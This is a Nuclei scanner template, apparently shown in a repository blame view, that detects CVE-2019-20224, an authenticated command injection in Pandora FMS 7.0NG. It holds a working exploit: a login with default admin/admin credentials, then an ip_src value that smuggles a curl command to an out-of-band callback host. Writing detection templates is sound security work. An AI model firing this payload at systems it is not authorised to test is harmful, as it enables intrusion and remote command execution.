nuclei-templates/http/cves/2019/CVE-2019-20224.yaml

60 lines
2.0 KiB
YAML
Raw Normal View History

2022-04-16 08:16:17 +00:00
id: CVE-2019-20224
info:
name: Pandora FMS 7.0NG - Remote Command Injection
2022-04-16 08:16:17 +00:00
author: ritikchaddha
2022-04-24 23:28:12 +00:00
severity: high
description: |
Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
2023-09-06 12:53:28 +00:00
remediation: This issue has been fixed in Pandora FMS 7.0 NG 742.
2022-04-16 08:16:17 +00:00
reference:
- https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
- https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9
- https://nvd.nist.gov/vuln/detail/CVE-2019-20224
2022-06-20 13:52:35 +00:00
- https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view
2023-07-11 19:49:27 +00:00
- https://pandorafms.com/downloads/solved-pandorafms-742.mp4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-20224
cwe-id: CWE-78
2023-10-14 11:27:55 +00:00
epss-score: 0.19183
epss-percentile: 0.95673
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: artica
product: pandora_fms
tags: pandorafms,rce,cve,cve2019,authenticated,oast
2022-04-16 08:16:17 +00:00
http:
2022-04-16 08:16:17 +00:00
- raw:
2022-04-24 23:28:12 +00:00
- |
POST /pandora_console/index.php?login=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nick=admin&pass=admin&login_button=Login
2022-04-16 08:16:17 +00:00
- |
POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw
2022-04-24 23:28:12 +00:00
cookie-reuse: true
host-redirects: true
2022-04-16 08:16:17 +00:00
max-redirects: 2
2023-07-11 19:49:27 +00:00
2022-04-16 08:16:17 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
name: "http"
2022-04-16 08:16:17 +00:00
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200